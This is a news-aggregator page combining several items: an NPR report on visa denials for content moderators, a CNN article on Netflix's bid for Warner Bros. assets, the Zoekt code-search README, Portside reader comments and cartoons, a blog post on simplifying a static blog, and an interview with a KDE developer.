Every device in the UniFi 5G lineup supports both physical SIMs and eSIM, giving you the freedom to choose your carrier and switch whenever needed with zero friction. All are equipped with dual SIM slots, with one SIM replaceable by eSIM, and are fully unlocked: any major carrier, any type of deployment, with one piece of hardware.

  • Unlocked hardware for all major carriers
  • Supports physical SIM and eSIM
  • Fast activation and easy carrier changes
  • Consistent performance across service providers

Carrier freedom built directly into the hardware from day 1.

The UniFi 5G lineup brings sleek design, powerful performance, easy installation, and genuine WAN flexibility to every deployment.

Latest Articles

State Department to deny visas to fact checkers and others, citing 'censorship'

Hacker News
www.npr.org
2025-12-05 04:59:08
Comments...
Original Article
The Harry S. Truman Federal Building, headquarters of the U.S. Department of State, in a 2024 file photo. The building was built in 1941 and has housed the office of the Secretary of State since 1947. Photo: Kevin Dietsch/Getty Images

The State Department is instructing its staff to reject visa applications from people who worked on fact-checking, content moderation or other activities the Trump administration considers "censorship" of Americans' speech.

The directive, sent in an internal memo on Tuesday, is focused on applicants for H-1B visas for highly skilled workers, which are frequently used by tech companies, among other sectors. The memo was first reported by Reuters; NPR also obtained a copy.

"If you uncover evidence an applicant was responsible for, or complicit in, censorship or attempted censorship of protected expression in the United States, you should pursue a finding that the applicant is ineligible" for a visa, the memo says. It refers to a policy announced by Secretary of State Marco Rubio in May restricting visas from being issued to "foreign officials and persons who are complicit in censoring Americans."

The Trump administration has been highly critical of tech companies' efforts to police what people are allowed to post on their platforms and of the broader field of trust and safety, the tech industry's term for teams that focus on preventing abuse, fraud, illegal content, and other harmful behavior online.

President Trump was banned from multiple social media platforms in the aftermath of his supporters' attack on the Capitol on Jan. 6, 2021. While those bans have since been lifted, the president and members of his administration frequently cite that experience as evidence for their claims that tech companies unfairly target conservatives — even as many tech leaders have eased their policies in the face of that backlash.

Tuesday's memo calls out H-1B visa applicants in particular "as many work in or have worked in the tech sector, including in social media or financial services companies involved in the suppression of protected expression."

It directs consular officers to "thoroughly explore" the work histories of applicants, both new and returning, by reviewing their resumes, LinkedIn profiles, and appearances in media articles for activities including combatting misinformation, disinformation or false narratives, fact-checking, content moderation, compliance, and trust and safety.

"I'm alarmed that trust and safety work is being conflated with 'censorship'," said Alice Goguen Hunsberger, who has worked in trust and safety at tech companies including OpenAI and Grindr.

"Trust and safety is a broad practice which includes critical and life-saving work to protect children and stop CSAM [child sexual abuse material], as well as preventing fraud, scams, and sextortion. T&S workers are focused on making the internet a safer and better place, not censoring just for the sake of it," she said. "Bad actors that target Americans come from all over the world and it's so important to have people who understand different languages and cultures on trust and safety teams — having global workers at tech companies in [trust and safety] absolutely keeps Americans safer."

In a statement, a State Department spokesperson who declined to give their name said the department does not comment on "allegedly leaked documents," but added: "the Administration has made clear that it defends Americans' freedom of expression against foreigners who wish to censor them. We do not support aliens coming to the United States to work as censors muzzling Americans."

The statement continued: "In the past, the President himself was the victim of this kind of abuse when social media companies locked his accounts. He does not want other Americans to suffer this way. Allowing foreigners to lead this type of censorship would both insult and injure the American people."

First Amendment experts criticized the memo's guidance as itself a potential violation of free speech rights.

"People who study misinformation and work on content-moderation teams aren't engaged in 'censorship'— they're engaged in activities that the First Amendment was designed to protect. This policy is incoherent and unconstitutional," said Carrie DeCell, senior staff attorney and legislative advisor at the Knight First Amendment Institute at Columbia University, in a statement.

Even as the administration has targeted those it claims are engaged in censoring Americans, it has also tightened its own scrutiny of visa applicants' online speech.

On Wednesday, the State Department announced it would require H-1B visa applicants and their dependents to set their social media profiles to "public" so they can be reviewed by U.S. officials.

NPR's Bobby Allyn and Michele Kelemen contributed reporting.

Netflix in exclusive talks to buy HBO

Hacker News
www.cnn.com
2025-12-05 04:36:42
Comments...
Original Article

Netflix has submitted the highest bid to date for Warner Bros. Discovery’s studio and streaming assets, according to people familiar with the secretive bidding process.

Netflix’s most recent offer, submitted on Thursday, valued the Warner Bros. studio, HBO Max streaming service and related parts of the company at around $28 per share, sources said.

Paramount also submitted a new bid on Thursday, closer to $27 per share, one of the sources added.

The two offers aren’t apples-to-apples, however, because Paramount has been trying to buy all of Warner Bros. Discovery, including CNN and other cable channels, while Netflix and another bidder, Comcast, have only shown interest in the studio and streaming assets.

The mega-media bidding war has intensified in recent days, captivating a wide swath of Hollywood and garnering attention from the Trump White House. Iconic brands like HBO and DC Comics hang in the balance.

Representatives for the companies involved have declined to comment. But leaks out of what is supposed to be a confidential process suggest that Netflix now has the pole position.

Paramount certainly perceives it that way; the company’s attorneys wrote to Warner Bros. Discovery CEO David Zaslav expressing “grave concerns” about the auction process.

Specifically, Paramount’s attorneys charged that WBD has “embarked on a myopic process with a predetermined outcome that favors a single bidder,” meaning Netflix.

Analysts said the letter could be a precursor to a hostile-takeover play by Paramount, which has moved aggressively in recent months under new CEO David Ellison’s leadership.

Late Thursday, Bloomberg reported that WBD and Netflix have entered exclusive talks.

Ellison kickstarted the auction process earlier in the fall by submitting multiple bids to Zaslav and the company’s board.

Analysts at the time predicted that a bidding war would break out, and that’s exactly what has happened, given that famed movie and TV studios rarely come onto the market.

Zaslav officially put up the for-sale sign in October. At the same time, he said that WBD’s previously announced plan to split the company into two publicly traded halves would continue to be pursued.

The WBD board had been under pressure to do something, since the company’s stock plummeted after it was formed through a 2022 merger, from roughly $25 a share to a low of $7.52.

The split plan helped to rejuvenate WBD’s shares earlier this year, and then word of Paramount’s offers sent the stock skyrocketing back toward $25.

Sources in Ellison’s camp have emphasized that Paramount would be disciplined in its pursuit of the Warner assets.

Meanwhile, people in Zaslav’s camp have argued that the proposed split was the best way to realize the value of all of WBD.

If the split still takes effect next year, the Warner Bros. half would house HBO Max and the movie studio, and the Discovery Global half would house CNN and other cable channels.

Paramount may have been trying to get ahead of the split by making unsolicited bids for the whole company.

Ellison’s pursuit is audacious, to be sure: Paramount’s market cap is currently one-fourth the size of WBD’s market cap.

But Ellison and his management team have been moving fast to revitalize Paramount and disprove skeptics across Hollywood.

It’s impossible to make sense of the WBD bidding war without understanding the “Trump card.”

Ellison and Paramount are perceived to have a mutually beneficial relationship with President Trump and the White House — and thus an advantage in getting any deal approved by the Trump administration. “That’s the Trump card,” an Ellison adviser remarked to CNN in October.

Past administrations proudly insisted that agencies like the Department of Justice, which enforces antitrust law, were independent of the president. Trump has replaced those norms with a new, overtly transactional approach.

Trump has repeatedly praised Ellison and his father Larry, Oracle’s executive chairman, who is a key player in Trump’s dealings with TikTok.

“They’re friends of mine. They’re big supporters of mine,” the president said in mid-October.

Numerous Republican lawmakers have also cheered the Ellison takeover of CBS and the rest of Paramount, especially the installation of Bari Weiss as editor in chief of CBS News.

Ellison has been both credited and criticized for forging a relationship with Trump’s inner circle this year despite donating nearly $1 million to Joe Biden’s reelection campaign last year.

Just a couple of weeks ago, Ellison landed an invitation to Trump’s White House dinner for Saudi Crown Prince Mohammed bin Salman.

What some have seen as savvy business practices, others have seen as media capitulation. And Ellison has stayed mostly quiet about the matter.

On Wednesday he was scheduled to appear at the DealBook Summit, an annual conference hosted by The New York Times in Manhattan. But he withdrew from the summit amid the negotiations with WBD and was later spotted back in Washington, D.C. for talks with officials there.

During the WBD bidding process, Paramount executives have bluntly argued that their offer will pass muster with Trump administration regulators while rival offers will not.

After all, any proposed sale could be held up for months, and even years, in Washington, either by Trump loyalists carrying out his wishes or by bureaucrats with genuine objections to media consolidation.

But Trump does not get a literal veto. When the Justice Department in 2017 sued to stop AT&T’s merger with Time Warner, a forerunner to WBD, the companies fought the case in court and prevailed.

Some Wall Street analysts have asserted that Netflix may be willing to stomach a similar legal battle.

Plus, Washington is not the only regulatory battleground that media companies have to worry about.

A WBD sale, in whole or in part, would face scrutiny in the United Kingdom, the European Union and some Latin American countries. Sources previously told CNN that the perception of Trump clearing the way for the Ellisons in the US could hurt them in other markets.

Media reports about Netflix emerging as the frontrunner for WBD’s studio and streaming assets have prompted some Republican elected officials to raise alarms about the prospective combination.

“Learning about Netflix’s ambition to buy its real competitive threat — WBD’s streaming business — should send alarm to antitrust enforcers around the world,” Sen. Mike Lee wrote on X. “This potential transaction, if it were to materialize, would raise serious competition questions — perhaps more so than any transaction I’ve seen in about a decade.”

A recent Bank of America analyst report put it this way: “If Netflix acquires Warner Bros., the streaming wars are effectively over. Netflix would become the undisputed global powerhouse of Hollywood beyond even its currently lofty position.”

Rats Snatching Bats Out of the Air and Eating Them–Researchers Got It on Video

Hacker News
www.smithsonianmag.com
2025-12-05 04:26:10
Comments...

Fast trigram based code search

Hacker News
github.com
2025-12-05 04:00:28
Comments...
Original Article

Zoekt: fast code search

"Zoekt, en gij zult spinazie eten" - Jan Eertink

("seek, and ye shall eat spinach" - My primary school teacher)

Zoekt is a text search engine intended for use with source code. (Pronunciation: roughly as you would pronounce "zooked" in English)

Note: This has been the maintained source for Zoekt since 2017, when it was forked from the original repository github.com/google/zoekt.

Background

Zoekt supports fast substring and regexp matching on source code, with a rich query language that includes boolean operators (and, or, not). It can search individual repositories, and search across many repositories in a large codebase. Zoekt ranks search results using a combination of code-related signals like whether the match is on a symbol. Because of its general design based on trigram indexing and syntactic parsing, it works well for a variety of programming languages.
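
To illustrate the trigram idea at toy scale, here is a sketch (in Rust for brevity, though Zoekt itself is written in Go and its real index is far more sophisticated): every trigram of the query must appear in a candidate document, and the few surviving candidates are then verified with a real substring check.

use std::collections::HashMap;

// Extract all overlapping 3-byte windows (ASCII-only for brevity).
fn trigrams(s: &str) -> Vec<&str> {
    (0..s.len().saturating_sub(2)).map(|i| &s[i..i + 3]).collect()
}

// Index: trigram -> sorted list of documents containing it.
fn build_index<'a>(docs: &'a [&'a str]) -> HashMap<&'a str, Vec<usize>> {
    let mut idx: HashMap<&str, Vec<usize>> = HashMap::new();
    for (doc_id, doc) in docs.iter().enumerate() {
        for t in trigrams(doc) {
            let list = idx.entry(t).or_default();
            if list.last() != Some(&doc_id) {
                list.push(doc_id);
            }
        }
    }
    idx
}

// Queries shorter than three bytes are out of scope for this sketch.
fn search(idx: &HashMap<&str, Vec<usize>>, docs: &[&str], q: &str) -> Vec<usize> {
    // Candidates must contain every trigram of the query...
    let mut cand: Option<Vec<usize>> = None;
    for t in trigrams(q) {
        let list = idx.get(t).cloned().unwrap_or_default();
        cand = Some(match cand {
            None => list,
            Some(c) => c.into_iter().filter(|d| list.contains(d)).collect(),
        });
    }
    // ...and are then verified, since trigram hits can be false positives.
    cand.unwrap_or_default()
        .into_iter()
        .filter(|&d| docs[d].contains(q))
        .collect()
}

fn main() {
    let docs = ["hello world", "help wanted", "goodbye"];
    let idx = build_index(&docs);
    assert_eq!(search(&idx, &docs, "hello"), vec![0]);
}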

The two main ways to use the project are

  • Through individual commands, to index repositories and perform searches through Zoekt's query language
  • Or, through the indexserver and webserver, which support syncing repositories from a code host and searching them through a web UI or API

For more details on Zoekt's design, see the docs directory .

Usage

Installation

go get github.com/sourcegraph/zoekt/

Note: It is also recommended to install Universal ctags, as symbol information is a key signal in ranking search results. See ctags.md for more information.

Command-based usage

Zoekt supports indexing and searching repositories on the command line. This is most helpful for simple local usage, or for testing and development.

Indexing a local git repo

go install github.com/sourcegraph/zoekt/cmd/zoekt-git-index
$GOPATH/bin/zoekt-git-index -index ~/.zoekt /path/to/repo

Indexing a local directory (not git-specific)

go install github.com/sourcegraph/zoekt/cmd/zoekt-index
$GOPATH/bin/zoekt-index -index ~/.zoekt /path/to/repo

Searching an index

go install github.com/sourcegraph/zoekt/cmd/zoekt
$GOPATH/bin/zoekt 'hello'
$GOPATH/bin/zoekt 'hello file:README'

Zoekt services

Zoekt also contains an index server and web server to support larger-scale indexing and searching of remote repositories. The index server can be configured to periodically fetch and reindex repositories from a code host. The webserver can be configured to serve search results through a web UI or API.

Indexing a GitHub organization

go install github.com/sourcegraph/zoekt/cmd/zoekt-indexserver

echo YOUR_GITHUB_TOKEN_HERE > token.txt
echo '[{"GitHubOrg": "apache", "CredentialPath": "token.txt"}]' > config.json

$GOPATH/bin/zoekt-indexserver -mirror_config config.json -data_dir ~/.zoekt/ 

This will fetch all repos under 'github.com/apache', then index the repositories. The indexserver takes care of periodically fetching and indexing new data, and cleaning up logfiles. See config.go for more details on this configuration.

Starting the web server

go install github.com/sourcegraph/zoekt/cmd/zoekt-webserver
$GOPATH/bin/zoekt-webserver -index ~/.zoekt/

This will start a web server with a simple search UI at http://localhost:6070. See the query syntax docs for more details on the query language.

If you start the web server with -rpc , it exposes a simple JSON search API at http://localhost:6070/api/search .

The JSON API supports advanced features including:

  • Streaming search results (using the FlushWallTime option)
  • Alternative BM25 scoring (using the UseBM25Scoring option)
  • Context lines around matches (using the NumContextLines option)

Finally, the web server exposes a gRPC API that supports structured query objects and advanced search options.

Acknowledgements

Thanks to Han-Wen Nienhuys for creating Zoekt. Thanks to Alexander Neubeck for coming up with this idea, and helping Han-Wen Nienhuys flesh it out.

Tidbits-Dec. 4-Reader Comments: No War on Venezuela; Hegseth Murder in the Caribbean; Mass Deportation Is NOT Deportation; Everyone Is Talking About Affordability; Peace in Ukraine & Peace in Europe; New Unreleased Song by John Lennon; Lots More…

Portside
portside.org
2025-12-05 03:48:09
Tidbits-Dec. 4-Reader Comments: No War on Venezuela; Hegseth Murder in the Caribbean; Mass Deportation Is NOT Deportation; Everyone Is Talking About Affordability; Peace in Ukraine & Peace in Europe; New Unreleased Song by John Lennon; Lots More… jay Thu, 12/04/2025 - 22:48 ...
Original Article



Dr. James MacLeod
December 4, 2025
MacLeodCartoons

Re: Opinion: Everyone Is Talking About Affordability — and Making the Same Mistake

Discussion of outlawing stock buybacks that were once illegal would be a crucial way to address the wage issue.

Given the corruption of our lawmakers this has a very long shot of being realized but like Medicare for All it is a crucial demand to raise and tie to the problem of depressed wages.

Jessica Benjamin



Students in the winter, mostly in the Midwest or on the East Coast, get a Snow Day: if a heavy snowstorm blankets their town, school is canceled and kids can play all day. In Los Angeles, students have not been going to school out of fear of being terrorized and kidnapped by our own government. You can keep ICE Day.

Lalo's cartoon archive can be seen here.

Lalo Alcaraz
December 3, 2025
CALÓ NEWS

Re: Amber Czech Was Murdered at Work. Tradeswomen Say It Could Have Happened to Any of Them.

This is horrible;  I was a shop steward for 35 years in the carpenters union local 157 NYC.

We take a harassment class and get certified among a dozen other certifications.

None of this only happens on non union jobs.

No woman is harassed on any of my jobs let alone killed?

Harassment of women is on the rise and maybe it is because a rapist is in the White House?

You can’t just look the other way, if you do you are an enabler.

There are so many things the public see and turns a blind eye to!!!

Humans are tribal and we have good tribes and bad it is your choice.

You can’t stand and listen to the president call a woman reporter “Piggie’ and not call him out on the spot.

Stupid and arrogant not very good qualities in the most powerful job in the world.

My union is the only place where women get paid the same pay as the men.

Speak up not after the fact.

Manipulation is rampant.

John Campo



Given that Trump is now pardoning drug traffickers—and we’ve watched him hand out clemency and favors to people who bought into his latest crypto grift—it’s becoming pretty clear that these so-called traffickers have one guaranteed way to avoid being targeted: buy what Trump is selling.

Nick Anderson
December 1, 2025
Pen Strokes

Re: Palestinians Offer a Much Clearer Path to Peace

"International law also requires adhering to the International Court of Justice advisory opinion in July 2024, which ruled that the entire occupation of Palestinian territories is illegal and must end. That would mean insisting that Israel withdraw from sovereign Palestinian territory, as the international force moves in for the transition to Palestinian governance. An international force, from the Palestinian perspective, is welcome under those terms – a whole chapter in the Palestinian Armistice plan is devoted to the issue."

Bill Rogers
Posted on Portside's Facebook page

Re: Peace in Ukraine – Peace in Europe

The Party of the European Left has condemned Russia’s military aggression against Ukraine as a violation of international law and denial of Ukraine’s sovereignty. However the EL has not aligned itself with NATO whose objective has been to end the war through military means. The ongoing war in Ukraine has claimed hundreds of thousands of lives, destroyed hundreds of towns and villages, and forced millions of people to flee. The danger of escalation into a general war between Russia and NATO persists and continues to grow. The EL stresses once more that all political and diplomatic initiatives aimed at achieving a ceasefire, bringing the war to a lasting and durable end, and preventing any further escalation must be taken, strengthened, and implemented immediately. Our solidarity can only be with the victims—the soldiers, civilians, refugees, and conscientious objectors on both sides—and not with the imperialist interests that fuel the conflict.

John Gilbert
Posted on Portside's Facebook page

Re: To Win Radical Success, Mamdani Understands, Is To Know When and Where To Compromise

I would call it building a coalition around central shared goals.  In the past it has too often been a move to the so-called center, which has been to capitulate to corporate Dems and to soft-pedal imperialist atrocities, abandoning the interest of working people in the process.  If the goals remain true to achieving affordability and dignity for ordinary working people of all races and religions, then let's give it a try. There are lots of good people out there.  We may have differences about exactly how to achieve our goals, but so many have ideas and experience that can help build a brand new plan, an effective plan that has never existed before.

Sonia Cobbins
Posted on Portside's Facebook page

Con Job President  --  Cartoon and Commentary by Clay Jones

Are you going to believe your lying wallet or your lying president?



When Donald Trump won the presidency in 2016, he was fortunate to be inheriting President Barack Obama's economy. It was such a strong economy that it took him almost four years to fuck it up. Throughout those four years, Trump took credit for the economy that the Black man created for him. What was really messed up is that in 2024, voters forgot who created that economy, and they restored Donald Trump to the presidency, believing he had something to do with it. Not only did voters forget that Donald Trump had nothing to do with creating a great economy, but they also forgot that he ruined President Obama's great economy and left office with the biggest loss of jobs since Hoover.

In 2024, Trump ran against Biden's economy, which most people felt was not strong enough. Since Trump has returned to office, the economy has gotten worse. While he claims the inflation he inherited from Biden was bad, it has gotten worse, too, since he's been in charge. Voters are starting to figure out that Trump has no idea how to build an economy. What might be freaking Trump out is that he might be realizing it, too.

Donald Trump knows how to rage-tweet while sitting on the toilet at 3 AM. Managing the largest economy in the world, not so much.

A recent Fox News poll found that 76% of voters view the economy negatively. Another poll by the Economist and YouGov finds that 58% disapprove of the job Trump is doing. Trump's polls on the economy are worse than Biden's were.

Even Trump must realize it, since he is lifting all tariffs on commodities like coffee, meat, and other foods. I guess we are supposed to forget his belief that tariffs don't raise prices, which is hard to argue while tariffs are raising prices. TACO indeed.

But Trump is becoming frustrated with the public for not appreciating the job he sucks at. During a cabinet meeting yesterday, Trump declared that affordability “doesn’t mean anything to anybody.” I'm sure it means something to all those congressional Republicans retiring before the midterms.

Trump called the issue of affordability a “fake narrative” and “con job” created by Democrats to dupe the public.

He said, “They just say the word. It doesn’t mean anything to anybody. They just say it — affordability. I inherited the worst inflation in history. There was no affordability. Nobody could afford anything.”

Of course, Trump, along with voters, forgets that President Biden inherited Trump's economy in 2020. The difference between Trump and Biden inheriting bad economies is that Biden fixed the one he got.

Republicans left bad economies for presidents Clinton, Obama, and Biden. And those presidents fixed them. Republicans are great at trashing economies, while Democrats are great at repairing them.

Donald Trump was calling himself the “affordability president,” but he's really only affordable for the people who bribe him, like crypto moguls and Saudi royalty. Democrats are going to be running a lot of commercials with Trump's affordability/con job comment.

I just hope the economy isn't trashed beyond repair by the time a Democrat is elected to repair the damage Trump has done to it.


Clay Jones
December 3, 2025
Claytoonz

Watching Rainbows  --  Unreleased song by John Lennon


Mr. Fish
MR. FISH’S CATCH OF THE DAY
December 4, 2025
The Independent Ink


Your MR. FISH’S CATCH OF THE DAY for Tuesday, December 4, 2025, is an unreleased Beatles song that I’ve been listening to for 40 years. It’s called Watching Rainbows and was recorded in 1969 during the Let It Be sessions as an improvised Lennon throwaway. Remarkably, it was not included in Peter Jackson’s documentary miniseries, Get Back, nor on any of the Anthology releases. Here are the lyrics, most likely invented by Lennon on the spot:

Standing in the garden waiting for the sun to shine
With my umbrella with its head I wish it was mine
Everybody knows…
Instead of watching rainbows I’m gonna make me some
I said I’m watching rainbows I’m gonna make me some

Standing in the garden waiting for the English sun to come and make me brown so I can be someone
Looking at the bench of next door neighbors
Crying, I said c’mon, I said, save us
Everybody’s got to have something hard to hold
Well, instead of watching rainbows under the sun
You gotta get out son and make you one
You gotta get out son and make your own
Because you’re ain’t gonna make it if you don’t

Shoot me
Shoot me
Whatever you do you gotta kill somebody to get what you wanna get
You gotta shoot me
You gotta shoot me

Please shoot me

Even before the Now and Then single was released in 2023 and announced as the “last Beatles song,” I thought Rainbows should be stitched together with McCartney’s Pillow for Your Head and Harrison’s Mother Divine, both incomplete compositions from the same time period, and released as a B-side medley to a re-release of the medley that closed out Abbey Road. The connecting tissue for Divine Rainbow Pillow could be composed by the two surviving members of the band, of course. In other words, now that we’ve all heard Now and Then and had our hearts broken by its mediocre production and flabby, uninspired demeanor, I can’t be alone in wishing there was a better swan song for the group! (Additionally, I have no fewer than 10 solo Lennon tracks that he recorded in the late 70s that all would’ve been better to riff off of for a “last” Beatles song — anything other than Now and Then, but I’ll save those for a later post - ha!)

Here are the tracks. Dig it.

WATCHING RAINBOWS

PILLOW FOR YOUR HEAD

MOTHER DIVINE


THE INDEPENDENT INK is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.


Mon, Dec 8 ⸱ 2-3pm ET • 1-2pm CT • Noon-1pm MT • 11am-Noon PT

Virtual Event ⸱ Zoom link shared after registration

Join Movement Voter PAC for our final briefing of the year – more of a “fireside chat” with movement leaders! – to celebrate our successes in 2025 and look ahead to 2026.

RSVP

Speakers:

  • Billy Wimsatt, Movement Voter PAC
  • LaTosha Brown, Black Voters Matter Fund
  • Ai-Jen Poo, Care in Action
  • Doran Schrantz, State Power Action Fund

Notes:

  • This call is open to the public.
  • We will record this briefing and send it to all who register.
  • After the briefing, you are welcome to join an optional 30-minute informal Q&A.
  • This is a partisan, political event. We invite our 501(c)(3) supporters and partners to attend in their personal capacity. Please consult your organization's legal counsel with any questions.


About Movement Voter PAC

MVP funds local organizing and movement-building groups working to shift culture, win power, and shape policy.

We just put out our 2025 recap — if you haven’t yet, check it out to see the incredible work MVP partners did this year to push for policy progress, turn back the tide of authoritarianism, and win the biggest elections of the year.

MVP operates like a “mutual fund” for political giving: We raise money from donors, then channel it toward the most impactful organizations and power-building work around the country.

We do the research so you don’t have to, streamlining your giving and maximizing your impact by investing in the most effective organizations and innovative strategies. (Bonus: You get to hit "unsubscribe" on all the political fundraising spam in your inbox!)

Movement Voter Project
37 Bridge Street, Box 749
Northampton, MA 01060

For all news and media inquiries, email press@movement.vote.

Warner Bros Begins Exclusive Deal Talks With Netflix

Hacker News
www.bloomberg.com
2025-12-05 03:44:12
Comments...

Blogging in 2025: Screaming into the Void

Hacker News
askmike.org
2025-12-05 02:55:34
Comments...
Original Article

Posted at December 04, 2025

Before social media became what it is today, I used to blog a lot. And I wasn't the only one; many people did. There was this idea of a decentralized and open web: everyone had their own little space on the web (with a self-hosted blog, or a platform like WordPress or Blogger).

The internet looks very different now. People consume (and produce) more on the internet than ever before, but almost all content lives on these big social media platforms designed to keep everything and everyone inside. It feels like the web is shrinking.

There seems to be some resurgence of the old web now; time will tell if it gains any real ground. It's an uphill battle: besides most online eyeballs now being glued to social media apps, we're seeing AI take over the way people interact with the internet altogether. Back in the old days, if you wanted to know more about something, you'd google the term and start going through the websites Google said were most relevant. Now AI is a lot more efficient at getting the answer to whatever you want to know in front of you in real time. If the answer was on a forum, blog or any other website, the AI will fetch it behind the scenes and summarize it for you. From a UX perspective, this is the obvious direction things will continue to go.

A second problem is that of quality: people who put a lot of time into their content (and are very good writers) can now more easily get paid for their work, through paid email newsletters and paywalled websites. All of their content no longer lives on the open web (but at least there are no ads there). This is probably a win for writers, as well as for the quality of the overall content being produced (and read) globally, but it's a loss for the open web.

So if you have a blog nowadays with all kinds of useful information (ignoring the discoverability as well as whether other people actually find it useful), how many people are really going to read it directly? Should you still put time into designing your blog and writing good articles?

Fighting fire (AI) with fire (AI)

Regardless of all of this, I feel a (nostalgic) desire to blog again. I used to keep two blogs: this techblog you are reading now and a travel/picture blog called mijnrealiteit. Whenever I get this feeling, I start by updating the blog software. Throughout the years both blogs have gone through different iterations: from custom CMS systems, to WordPress instances with custom themes, to ending up as simple statically generated websites. You can find some historical posts here.

So I turn to an AI coding tool, which has the power to write or change hundreds of lines of code in seconds from a simple one-sentence instruction. AI coding tools are a widely debated topic in programming circles. They can clearly write a lot of code very quickly, and in my experience there are definitely cases where the speed and quality outpace what a human developer can do. But there are also many cases where they write junk (called slop) and do things that make no sense.

I actually wanted to do the very opposite of what "vibe coders" typically use AI tools for: instead of providing a simple (and vague) instruction and letting the AI go crazy building a new blog from scratch, I used it to strip and simplify my existing blog software towards the open-web hygiene I value:

  • Remove all external javascript (visitor trackers, etc)
  • Remove other third party dependencies as well, like fonts loaded from Google
  • Make the HTML / CSS structure "minimal" and dead simple, with a design that works well on mobile and desktop
  • Migrate away from the unfortunately unmaintained static site generation framework WinterSmith; instead, use a super simple script that just generates all pages inline (a sketch of the idea follows this list).
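
The post doesn't include the script itself, so here is a minimal sketch of what "just generate all pages inline" can look like. This is an illustrative sketch, not the author's actual code: the posts/ directory layout, the template, and the use of the python-markdown package are all my assumptions.

    # build.py -- minimal static blog generator (illustrative sketch)
    from pathlib import Path
    import markdown  # pip install markdown

    TEMPLATE = """<!doctype html>
    <html><head><meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>{title}</title></head>
    <body>
    {body}
    </body></html>"""

    out = Path("public")
    out.mkdir(exist_ok=True)
    for src in sorted(Path("posts").glob("*.md")):
        body = markdown.markdown(src.read_text(encoding="utf-8"))
        page = TEMPLATE.format(title=src.stem, body=body)
        (out / f"{src.stem}.html").write_text(page, encoding="utf-8")

Note there is nothing here that tracks visitors and nothing fetched from third parties: the output is plain HTML files you can serve from anywhere.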

You can find the code for mijnrealiteit on GitHub; I'll publish the code for this blog soon as well.

It's all live now, as well as a super minimal "about me" site on mvr.com. So I can get back to blogging! Will anyone actually read anything I post? I won't know, since I removed all trackers. So for now I am screaming into the void.

Lobsters Interview with Aks

Lobsters
lobste.rs
2025-12-05 02:41:30
I know @Aks from IRC. He works on KDE Software, has made many lovely games and I even use his colorscheme in my terminal! Please introduce yourself! I'm Akseli but I usually go as Aks on the internet. I'm in my 30s and I'm from Finland. I've liked computers since I was a kid, so naturally I ended up...
Original Article

I know @Aks from IRC. He works on KDE Software, has made many lovely games and I even use his colorscheme in my terminal!

Please introduce yourself!

I'm Akseli but I usually go as Aks on the internet. I'm in my 30s and I'm from Finland. I've liked computers since I was a kid, so naturally I ended up doing computer stuff as a day job. Nowadays I work on KDE software at TechPaladin.

How did you first discover computers as a kid?

I was 3-4 years old. We had an old 386 DOS computer and I usually played games like Stunts on it. I was always behind when it came to hardware: while all my peers at school had PS2s, I played on the NES and PS1. Over time I just liked to play and tinker with different kinds of machines, mostly old left-over computers. But games were my main hook; I always wanted to make my own. And I did!

What were your first games like?

My very first game was with FPS Creator when I was ~13. My friend and I had some inside joke about a game with tons of enemies and a gun with 6 bullets, so I ended up recreating that. The game is really bad, but that was sort of the point. I made the next game when I was 18 or so, with Unity. Similar theme, but this time the enemies were dancing and bouncing skeletons, and you had a shotgun. It was so silly. I then made a roguelike, a 3D platformer, and an FPS called Penance that has about 19k downloads. You can find my games on Itch. Lately though, I haven't had the energy to finish my game projects, e.g. Artificial Rage: https://codeberg.org/akselmo/Artificial-Rage

I sank a fair few hours into Penance! I also really liked the Christmas game you made your sister. Do you ever put Easter eggs in code or often make projects for others like that?

I put in some Easter eggs. For example, someone complained that in Penance all the weapons look like woolen socks(?). So I added a pair of wooly socks in the starting area. I also proposed to my wife with a game, which had a small hallway with pictures of us. It was a fun little project, but a bit cut short since I tried to work on it in secret, which proved difficult! We have made a few games together. She went to a web-dev bootcamp but doesn't code anymore, although she gladly works with me on various game projects.

How do you ideate the game play, style and such things?

While playing, I usually think "it would be cool if I had this game but changed this and that..", which provides a great starting point. Then it just naturally evolves into its own thing. Penance was pretty much me going "I want Quake but with randomly generated levels", but then I ended up making a campaign with handcrafted levels for it anyway, beside the randomly generated endless mode.

Really, I just make things I want to play. People liking it is just a bonus. One of my favorite game projects is Castle Rodok because it is full of lore about my own RPG world. It's not very popular, but I like it a lot. It was a passion project.

What languages and technologies did you use?

With tools, I'm driven by need more than wants. My day job is all C++, which I'm fine with. I am very much a fan of "C-style" languages. They're boring and get the job done. For things I want to get running quickly, I usually use Python, which I used a lot in test automation for all kinds of devices. Mostly medical devices, so I can't talk about them due to NDAs.

Most of my games have been in Unity, but Crypt of Darne uses Python and I also have played around with C and Odin for my game projects.

I have tried LISPs and functional programming languages and such, but I just have a hard time with them, especially those that propose a completely different syntax. I haven't had any projects with Rust, but I liked tinkering with it, besides the 'lifetime syntax, which I easily miss. I am very boring when it comes to programming languages; I like to stick with what I know. I daydream about what I could create: games, apps, systems software, drivers... Many ideas but hardly any time. But work comes first, so I mostly work on KDE things right now. For my own things, if I feel like working on a game, I go with the flow and do that.

What was your experience with different OSes before finding KDE?

I'd wanted to move on from Windows and dabbled with Linux a bunch, but could never stick with it because I could not play any games I owned on Linux. When I learned that Linux systems can in fact game, it didn't take me long to switch. At first, I just dual-booted and tested the waters. I tried Linux Mint and Ubuntu, which were fine, but I had some issues with X11 and its compositing eating all the FPS, so I gave up for a while. Six months later I tried Kubuntu, which worked really well for my needs. After some time I hopped to Fedora KDE, and there I found out that Wayland completely removed the issue with compositing eating FPS in games. KDE was also very easy to learn and understand; I didn't really need to customize it. Then I found an annoying bug I wanted to fix, and started to contribute.

What was the first contribution experience like?

I had no idea how to do anything with C++. I had learned C from scratch making Artificial Rage, studying how to create a project with CMake and all that, but luckily the internet is full of advice. So I had not used C++ before and just started learning in order to make that first contribution! I just joined the Matrix chats and asked questions; people were very helpful. Onboarding was great. The contribution wasn't very big though; I just looked at the surrounding code and made my contribution look the part. Feedback in the merge request on GitLab helped wrap it up. One of my first larger contributions, though, was adding region and language settings to System Settings. This allowed users to change, for example, date-time settings separately from currency. This was a mix of C and C++ and was difficult! Diligently reading the docs, looking at similar code and a lot of build->test->change->build again... it started to work! Then the reviews helped too. But C++ is such a different beast, I'm still learning it to this day. I'd say I know less C++ and more about problem solving.

It also helps that the "Qt dialect" of C++ is rather nice. The Qt framework does a lot of the work for you: for example, the signal and slot system, or parent objects that delete their children when they themselves are destroyed. Qt's documentation is also pretty great.
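
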